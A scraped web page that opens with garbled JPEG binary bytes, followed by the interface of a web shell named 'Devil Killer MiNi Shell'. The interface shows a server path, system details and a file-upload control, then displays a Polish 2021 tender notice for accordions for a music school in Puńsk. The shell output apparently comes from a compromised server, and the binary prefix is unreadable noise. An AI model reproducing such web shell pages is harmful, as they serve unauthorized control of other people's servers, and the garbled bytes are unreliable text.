JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210730/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210730/0013258601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00132586 z dnia 2021-07-30</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa instrumentów muzycznych do Szkoły muzycznej w Puńsku nr 3 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Puńsk</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790671120</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mickiewicza 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Puńsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-515</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">875161048</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug_punsk@pro.onet.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.ugpunsk.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa instrumentów muzycznych do Szkoły muzycznej w Puńsku nr 3 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-495b6031-f11e-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00132586</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00015683/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup instrumentów muzycznych dla Szkoły Muzycznej w Puńsku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt nr LT-PL-4R-304 „Wspólna inicjatywa zatrudnieniowa młodzieży w celu zaspokojenia potrzeb transgranicznego rynku pracy” realizowanego w ramach Programu INTERREG V-A Litwa-Polska 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ oraz http://www.punsk.biuletyn.net/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający wyznacza Pana Piotra Pietruszkiewicza e-mail: d.wolyniec@ugpunsk.pl - do kontaktowania się z Wykonawcami.<br/>9.2. Komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie. <br/>Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elektronicznej za pośrednictwem miniPortalu znajdującego się pod adresem: https://miniportal.uzp.gov.pl/ <br/>ePUAPu: epuap.gov.pl/wps/portal <br/>(w wyszukiwarce podmiotu należy wpisać „Urząd Gminy w Puńsku”),<br/>elektroniczna skrzynka podawcza ePUAP: /2009042/SkrytkaESP ,<br/>a także poczty elektronicznej: d.wolyniec@ugpunsk.pl<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się Identyfikatorem postępowania: ZP.271.8.2021</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający wyznacza Pana Piotra Pietruszkiewicza e-mail: d.wolyniec@ugpunsk.pl - do kontaktowania się z Wykonawcami.<br/>9.2. Komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie. <br/>Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elektronicznej za pośrednictwem miniPortalu znajdującego się pod adresem: https://miniportal.uzp.gov.pl/ <br/>ePUAPu: epuap.gov.pl/wps/portal <br/>(w wyszukiwarce podmiotu należy wpisać „Urząd Gminy w Puńsku”),<br/>elektroniczna skrzynka podawcza ePUAP: /2009042/SkrytkaESP ,<br/>a także poczty elektronicznej: d.wolyniec@ugpunsk.pl<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się Identyfikatorem postępowania: ZP.271.8.2021<br/>Wymagania techniczne dostępne pod adresami: https://epuap.gov.pl/wps/portal/strefa-klienta/regulamin oraz https://miniportal.uzp.gov.pl/WarunkiUslugi</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Wójt Gminy Puńsk, tel.: 87 5161 048<br/>	inspektorem ochrony danych osobowych w Urzędzie Gminy w Puńsku jest Pani/Pani Agnieszka Szołtysek, e-mail: iod.ug.punsk@grupaformat.pl;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego „Dostawa instrumentów muzycznych do Szkoły muzycznej w Puńsku nr 3” prowadzonym w trybie przetargu nieograniczonego;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania .<br/>	Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1- AKORDEONY Z KONWERTEREM (3 manuały: dyszkantowy, basowo-akordowy, melodyczny):<br/>L.p.	Prawa część instrumentu	Lewa część instrumentu	Cechy ogólne<br/>1. •	61 guzik i więcej<br/>•	system rosyjski B <br/>•	5 rzędów<br/>•	2 – chóry (lub więcej)<br/>•	3 regestry (lub więcej)<br/>•	strój 16’+8’	Manuał basowy: <br/>•	72 – 96 basów<br/>•	3 – chóry <br/><br/>Manuał melodyczny:<br/>•	system rosyjski B<br/>•	przynajmniej 37 barytonów<br/>•	1 - chór	Waga: 6 – 7,5 kg<br/>Wymiary: 32-37 x 19 – 20,5 [cm]<br/><br/>Głosy standardowe lub lepsze<br/><br/>2. •	77 guzików<br/>•	system rosyjski B <br/>•	5 rzędów<br/>•	3 – chóry <br/>•	7 regestrów<br/>•	3 regestry brodowe<br/>•	strój 16’+ 8’+4’	Manuał basowy: <br/>96 – 102 basy<br/>4 – chóry <br/>5 regestrów i więcej +R<br/><br/>Manuał melodyczny:<br/>•	system rosyjski B<br/>•	42 – 43 barytony<br/>•	2 – chóry	Waga: 9 – 10 kg <br/>Wymiary: 38,5 – 39,5 x 20 – 21,5 [cm]<br/><br/>Głosy standardowe lub lepsze<br/><br/>3. •	87 guzików <br/>•	system rosyjski B <br/>•	5 rzędów<br/>•	3 – chóry <br/>•	7 regestrów<br/>•	4 regestry brodowe<br/>•	strój 16’+8’+4’	Manuał basowy:<br/>•	108 – 118 basów<br/>•	4 – chóry <br/>•	5 regestrów i więcej +R<br/><br/>Manuał melodyczny:<br/>•	system rosyjski B<br/>•	49 barytonów<br/>•	2 – chóry	Waga: 10 – 11 kg<br/>Wymiary: 40 – 41 x 20 – 21,5 [cm]<br/><br/>Głosy standardowe lub lepsze </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37311000-1 - Instrumenty klawiszowe</p> <p class="mb-0">37311200-3 - Akordeony</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1	Zamawiający dokona oceny ofert, które nie zostały odrzucone na podstawie następujących kryteriów oceny ofert:<br/><br/>•	K1. Cena ofertowa (waga kryterium 60%)<br/>•	K2. Gwarancja i rękojmia (waga kryterium 40%)<br/><br/><br/>1)	Cena ofertowa (K1) - waga – 60 %,<br/>Liczba punktów liczona będzie według formuły:<br/>(Cn / Cof.b) x 60 = liczba punktów, gdzie:<br/>Cn – najniższa cena spośród ofert,<br/>Cof.b – cena oferty badanej,<br/>60 – maksymalna ilość punktów, możliwa do uzyskania w ramach tego kryterium<br/><br/><br/>2)	Gwarancja i rękojmia (K2) – waga – 40%<br/>Ocenie podlega okres gwarancji i rękojmi w skali 0, 5, 10, 15, 20, 25, 30, 35, 40 - punktów, przy czym 1% odpowiada 1 pkt<br/><br/>Liczby punktów liczona będzie następująco:<br/>Okres gwarancji i rękojmi liczony jest w pełnych latach, przy czym<br/>a)	za okres udzielenia gwarancji i rękojmi wynoszący 2 lata – 0 punktów,<br/>b)	za okres udzielenia gwarancji i rękojmi wynoszący 3 pełne lata – 5 punktów,<br/>c)	za okres udzielenia gwarancji i rękojmi wynoszący 4 pełne lata – 10 punktów,<br/>d)	za okres udzielenia gwarancji i rękojmi wynoszący 5 pełnych lat – 15 punktów.<br/>e)	za okres udzielenia gwarancji i rękojmi wynoszący 6 pełnych lat – 20 punktów<br/>f)	za okres udzielenia gwarancji i rękojmi wynoszący 7 pełnych lat – 25 punktów<br/>g)	za okres udzielenia gwarancji i rękojmi wynoszący 8 pełnych lat – 30 punktów<br/>h)	za okres udzielenia gwarancji i rękojmi wynoszący 9 pełnych lat – 35 punktów<br/>i)	za okres udzielenia gwarancji i rękojmi wynoszący 10 pełnych lat i więcej – 40 punktów<br/><br/><br/>Punkty będą przyznawana za pełne lata np. za okres gwarancji i rękojmi wynoszący<br/>5 lat i 6 miesięcy – 15 punktów.<br/><br/>Minimalny okres gwarancji i rękojmi wynosi 2 lata. Nie wskazanie okresu gwarancji i rękojmi, lub wskazanie okresu gwarancji i rękojmi krótszego niż 2 lata będzie skutkować odrzuceniem oferty.<br/><br/><br/><br/>Łączną liczbę punktów oferty „W” stanowi suma punktów oferty osiągnięta w każdym z kryteriów oceny:<br/>W = K1+K2<br/>Maksymalna łączna liczba punktów, jaką może uzyskać oferta wynosi 100.<br/>Za najkorzystniejszą, Zamawiający wybierze ofertę, która uzyska największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> •	37 klawiszy<br/>•	3 – chóry i więcej<br/>•	7 regestrów i więcej<br/>•	1 regestr brodowy i więcej<br/>•	strój 16’+8’+4’	Manuał basowy:<br/>•	118 – 120 basów<br/>•	4 – chóry <br/>•	5 regestrów i więcej +R<br/><br/>Manuał melodyczny:<br/>•	system rosyjski B<br/>•	49 lub więcej barytonów<br/>•	2-chóry	Waga: 9-14 kg<br/>Wymiary: 42 - 49 x 20-22 [cm]<br/><br/>Głosy Typu Hand Made lub lepsze </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37311000-1 - Instrumenty klawiszowe</p> <p class="mb-0">37311200-3 - Akordeony</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1	Zamawiający dokona oceny ofert, które nie zostały odrzucone na podstawie następujących kryteriów oceny ofert:<br/><br/>•	K1. Cena ofertowa (waga kryterium 60%)<br/>•	K2. Gwarancja i rękojmia (waga kryterium 40%)<br/><br/><br/>1)	Cena ofertowa (K1) - waga – 60 %,<br/>Liczba punktów liczona będzie według formuły:<br/>(Cn / Cof.b) x 60 = liczba punktów, gdzie:<br/>Cn – najniższa cena spośród ofert,<br/>Cof.b – cena oferty badanej,<br/>60 – maksymalna ilość punktów, możliwa do uzyskania w ramach tego kryterium<br/><br/><br/>2)	Gwarancja i rękojmia (K2) – waga – 40%<br/>Ocenie podlega okres gwarancji i rękojmi w skali 0, 5, 10, 15, 20, 25, 30, 35, 40 - punktów, przy czym 1% odpowiada 1 pkt<br/><br/>Liczby punktów liczona będzie następująco:<br/>Okres gwarancji i rękojmi liczony jest w pełnych latach, przy czym<br/>a)	za okres udzielenia gwarancji i rękojmi wynoszący 2 lata – 0 punktów,<br/>b)	za okres udzielenia gwarancji i rękojmi wynoszący 3 pełne lata – 5 punktów,<br/>c)	za okres udzielenia gwarancji i rękojmi wynoszący 4 pełne lata – 10 punktów,<br/>d)	za okres udzielenia gwarancji i rękojmi wynoszący 5 pełnych lat – 15 punktów.<br/>e)	za okres udzielenia gwarancji i rękojmi wynoszący 6 pełnych lat – 20 punktów<br/>f)	za okres udzielenia gwarancji i rękojmi wynoszący 7 pełnych lat – 25 punktów<br/>g)	za okres udzielenia gwarancji i rękojmi wynoszący 8 pełnych lat – 30 punktów<br/>h)	za okres udzielenia gwarancji i rękojmi wynoszący 9 pełnych lat – 35 punktów<br/>i)	za okres udzielenia gwarancji i rękojmi wynoszący 10 pełnych lat i więcej – 40 punktów<br/><br/><br/>Punkty będą przyznawana za pełne lata np. za okres gwarancji i rękojmi wynoszący<br/>5 lat i 6 miesięcy – 15 punktów.<br/><br/>Minimalny okres gwarancji i rękojmi wynosi 2 lata. Nie wskazanie okresu gwarancji i rękojmi, lub wskazanie okresu gwarancji i rękojmi krótszego niż 2 lata będzie skutkować odrzuceniem oferty.<br/><br/><br/><br/>Łączną liczbę punktów oferty „W” stanowi suma punktów oferty osiągnięta w każdym z kryteriów oceny:<br/>W = K1+K2<br/>Maksymalna łączna liczba punktów, jaką może uzyskać oferta wynosi 100.<br/>Za najkorzystniejszą, Zamawiający wybierze ofertę, która uzyska największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Prawa część instrumentu	Lewa część instrumentu	Cechy ogólne<br/>•	akordeon basowy<br/>•	34 klawisze i więcej<br/>•	2-chóry i więcej Waga: 7,9 – 9 kg<br/>Wymiary: 42 – 44 x 20 – 24 [cm]<br/><br/>Głosy wykonane ręcznie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37311000-1 - Instrumenty klawiszowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje 